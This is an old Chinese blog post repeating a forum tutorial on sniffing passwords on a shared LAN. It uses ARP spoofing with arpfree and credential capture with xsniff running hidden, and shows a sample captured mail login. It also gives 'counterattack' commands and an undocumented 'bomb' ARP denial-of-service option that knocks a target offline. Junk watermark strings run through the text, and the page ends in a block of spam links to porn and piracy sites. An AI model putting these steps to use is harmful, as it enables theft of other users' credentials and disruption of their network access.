<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    天若有情

    到教堂懺悔,愿主安撫我罪惡的心靈......
    posts - 4, comments - 35, trackbacks - 0, articles - 24

    arpfree + xsniff嗅探局域網(wǎng)密碼

    Posted on 2008-09-13 19:07 freedoom 閱讀(1846) 評(píng)論(0)  編輯  收藏 所屬分類(lèi): hacker

    arpfree + xsniff嗅探局域網(wǎng)密碼

    試驗(yàn)環(huán)境:
       一臺(tái)八口共享上網(wǎng)路由器,接八臺(tái)電腦 !在其中一臺(tái)機(jī)器上嗅探密碼Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間

    步驟如下:Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間 LE MB&kr0`
            1,首先ping 192.168.0.1 網(wǎng)關(guān),然后用arp -a 獲得網(wǎng)關(guān)Mac地址 0000ea0123deNetexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間
          2,使用arpfree欺騙網(wǎng)關(guān),讓它將其他機(jī)器發(fā)向網(wǎng)關(guān)的包發(fā)給嗅探主機(jī)
              命令如下:Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間pgR4K wO,tG/H
                     arpfree 0000ea0123de 123412341234 request 1.1.1.1 
            3,啟動(dòng)sniff開(kāi)始嗅探
                 命令如下:           
      xsniff -pass -hide -log pass.log 

       4,打開(kāi)pass.log就能察看嗅探到的密碼!
          示例: 
       TCP  [05/10/06 22:17:40]
    192.168.0.8->202.108.9.77 Port: 1158->80
        HOST: mail.163.com USER: 1111111, PASS: 1111111
    Arpfree + X-Sniff嗅探局域網(wǎng)密碼
    游泳的魚(yú) 發(fā)表于 2008-1-14 15:48:00
     
    0
    ARP簡(jiǎn)介:

    要使用ARP欺騙,必須啟動(dòng)ip路由功能,修改(添加)注冊(cè)表選項(xiàng):
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1

    發(fā)送ARP報(bào)文的軟件,可以發(fā)送任意 源,目的 地址的ARP報(bào)文,可以結(jié)合Sniffer做不少的事~不用老在Sniffer里做ARP包了~

    不過(guò)要安裝WinPacp 3.0驅(qū)動(dòng)先...

    發(fā)送的時(shí)候可以選擇ARP的TYPE。如果是ARP請(qǐng)求報(bào)文,則只要輸入要訪問(wèn)的IP地址。

    如果是ARP應(yīng)答報(bào)文則要輸入發(fā)送端的IP以及對(duì)方詢(xún)問(wèn)MAC地址對(duì)應(yīng)的IP地址

    最后的發(fā)送速度可選參數(shù)為:(大小寫(xiě)敏感..我覺(jué)得挺不好的)

    fast---------最快
    hear---------每60ms一個(gè)包(可能是比較適合結(jié)合Sniffer做監(jiān)聽(tīng))
    slowhear-----每500ms一個(gè)包
    auto---------每1秒一個(gè)包
    slow---------每2秒個(gè)包

    使用方法如下:

    ***********************************************************************
    (1)Send arp packet in "request mode"  Examples:           
      arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast     
             |      |     |   |  |      
          你的網(wǎng)卡地址    |     |   |  |      
                 對(duì)方網(wǎng)卡地址   |   | 速度     
                       arp方式   |         
                             |         
                          你的IP地址       
    ***********************************************************************
    (2)Send arp packet in "reply mode"  Examples:                     
        arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto   
            |      |    |   |   |  |      
         你的網(wǎng)卡地址    |    |   |   |  |      
                對(duì)方網(wǎng)卡地址  |   |   |  速度     
                     arp方式   |   |      
                           |   |      
                        你的IP地址  |      
                              |           
                             對(duì)方IP地址       
    ***********************************************************************


    反擊“Lan終結(jié)者”的辦法:

    1:發(fā)動(dòng)比他更強(qiáng)烈的攻擊:

    arpfree 0050fc272b26 ffffffffffff request 1.1.1.1 fast     
           |     |    |   |  |      
        你的網(wǎng)卡地址   |    |   |  |      
             對(duì)方網(wǎng)卡地址 |   | 速度     
                  arp方式  |         
                        |         
                     你的IP地址       
    2:交換機(jī)競(jìng)爭(zhēng):
    arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
           |      |     |   |   |      
        你的網(wǎng)卡地址    |     |   |   |      
           你想攻擊的人的網(wǎng)卡地址  |   |   速度     
                    arp方式    |         
                           |         
                       你的IP地址       

    方法1將導(dǎo)致他IP地址沖突(比“終結(jié)者”來(lái)的猛烈多了)

    方法2將使得他無(wú)法連接網(wǎng)絡(luò)(由于交換機(jī)把他的流量都給你了)

    ***********************************************************************

    因?yàn)橛信笥逊从吃诜墙粨Q環(huán)境下,如使用HUB的情況下,無(wú)法對(duì)目標(biāo)進(jìn)行打擊

    故增加參數(shù)“bomb”,使用方法如下:

    假設(shè)目標(biāo)為IP:192.168.237.109 目標(biāo)mac為:011a8575a436

    攻擊命令如下:

    arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb

    其實(shí)就是進(jìn)行簡(jiǎn)單的ARP DOS攻擊,快速刷新目標(biāo)的ARP緩存,可以在消耗自身較少系統(tǒng)資源的情況下

    造成和PDOS工具類(lèi)似的效果,并且如果你不停止攻擊,對(duì)方重啟以后也無(wú)法正常進(jìn)入系統(tǒng)

    (當(dāng)然前提是他沒(méi)拔網(wǎng)線)。

    其實(shí)這樣做是十分不厚道的....所以參數(shù)就沒(méi)有寫(xiě)在程序的 HELP 里面,大家慎用...


    =========================================================================

    X-Sniff嗅探器

    可捕獲局域網(wǎng)內(nèi)FTP/SMTP/POP3/HTTP協(xié)議密碼

    參數(shù)說(shuō)明 
    -tcp 輸出TCP數(shù)據(jù)報(bào) 
    -udp 輸出UDP數(shù)據(jù)報(bào) 
    -icmp 輸出ICMP數(shù)據(jù)報(bào) 
    -pass 過(guò)濾密碼信息 
    -hide 后臺(tái)運(yùn)行 
    -host 解析主機(jī)名 
    -addr IP地址 過(guò)濾IP地址 
    -port 端口 過(guò)濾端口 
    -log 文件名 將輸出保存到文件 
    -asc 以ASCII形式輸出 
    -hex 以16進(jìn)制形式輸出 
    用法示例 
    xsniff.exe -pass -hide -log pass.log 后臺(tái)運(yùn)行嗅探密碼并將密碼信息保存在pass.log文件中 
    xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并過(guò)濾tcp和udp信息并以ASCII格式輸出.


    ==========================================================================

    實(shí)驗(yàn)開(kāi)始...

    試驗(yàn)環(huán)境:

        一臺(tái)八口共享上網(wǎng)路由器,接八臺(tái)電腦,在其中一臺(tái)機(jī)器上嗅探密碼

    步驟如下:

        1.首先ping 192.168.0.1 網(wǎng)關(guān),然后用arp -a 獲得網(wǎng)關(guān)Mac地址 0000ea0123de
        2.使用arpfree欺騙網(wǎng)關(guān),讓它將其他機(jī)器發(fā)向網(wǎng)關(guān)的包發(fā)給嗅探主機(jī)  命令如下:
          arpfree 0000ea0123de 123412341234 request 1.1.1.1 hear
        3.啟動(dòng)X-Sniff開(kāi)始嗅探  命令如下:
          xsniff -pass -hide -log pass.log
        4.打開(kāi)pass.log就能察看嗅探到的密碼!

    示例:
        TCP  [05/10/06 22:17:40]
        192.168.0.8->202.108.9.77 Port: 1158->80
        HOST: mail.163.com USER: 1111111, PASS: 1111111

    如果是非交換環(huán)境,可省略1,2步。

    面提到的xsniff.exe 十分小巧,但是功能強(qiáng)大,呵呵呵!
    0使用說(shuō)明 請(qǐng)看下面的

    可捕獲局域網(wǎng)內(nèi)FTP/SMTP/POP3/HTTP協(xié)議密碼
    參數(shù)說(shuō)明  

    輸出TCP數(shù)據(jù)報(bào)  
    -udp 輸出UDP數(shù)據(jù)報(bào)  
    -icmp 輸出ICMP數(shù)據(jù)報(bào)  
    -pass 過(guò)濾密碼信息  
    -hide 后臺(tái)運(yùn)行  
    -host 解析主機(jī)名 
    -addr IP地址 過(guò)濾IP地址  
    -port 端口 過(guò)濾端口  
    -log 文件名 將輸出保存到文件  
    -asc 以ASCII形式輸出  
    -hex 以16進(jìn)制形式輸出  Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間!E x"vM/LEu
    用法示例  
    xsniff.exe -pass -hide -log pass.log 后臺(tái)運(yùn)行嗅探密碼并將密碼信息保存在pass.log文件中  
    xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并過(guò)濾tcp和udp信息并以ASCII格式輸出.
    上面提到的arpfree工具使用說(shuō)明請(qǐng)看 url]http://www.netexpert.cn/viewthread.php?tid=550[/url]Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間Zw+^9GqCZ
    Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間0K:Tz#@O)A0cc
    [ 本帖最后由 diker 于 2006-5-11 12:14 編輯 ]Netexpert網(wǎng)絡(luò)分析專(zhuān)家個(gè)人空間t,[$BWSmu:Y
    主站蜘蛛池模板: 亚洲a∨国产av综合av下载| 欧洲美女大片免费播放器视频| 啦啦啦在线免费视频| 老司机午夜在线视频免费观| 国产av天堂亚洲国产av天堂| 成人免费毛片内射美女-百度| 国产亚洲精品第一综合| 亚洲avav天堂av在线不卡| 成年人在线免费观看| 99久久免费国产特黄| 亚洲综合一区无码精品| 久久亚洲AV永久无码精品| 成人黄色免费网址| 一本久久免费视频| 亚洲一级毛片在线观| 亚洲日韩VA无码中文字幕| 男女做羞羞的事视频免费观看无遮挡| 国产精品久久亚洲一区二区| 久久精品国产亚洲精品2020| avtt亚洲天堂| 免费看污成人午夜网站| 中文字幕在线观看免费| 亚洲av乱码一区二区三区按摩| 亚洲国产人成在线观看69网站 | 伊人久久亚洲综合影院| 1000部拍拍拍18勿入免费凤凰福利 | 日本XXX黄区免费看| a级成人毛片免费视频高清| 在线观看亚洲精品专区| 亚洲精品视频观看| 亚洲日韩欧洲无码av夜夜摸| 国产又黄又爽又刺激的免费网址| 免费精品无码AV片在线观看| 一级中文字幕乱码免费| 亚洲精品无码专区久久| 亚洲精品自拍视频| 亚洲国产精品无码久久一线| 亚洲国产天堂久久综合| 日本a级片免费看| AV片在线观看免费| 亚洲视频在线观看免费视频|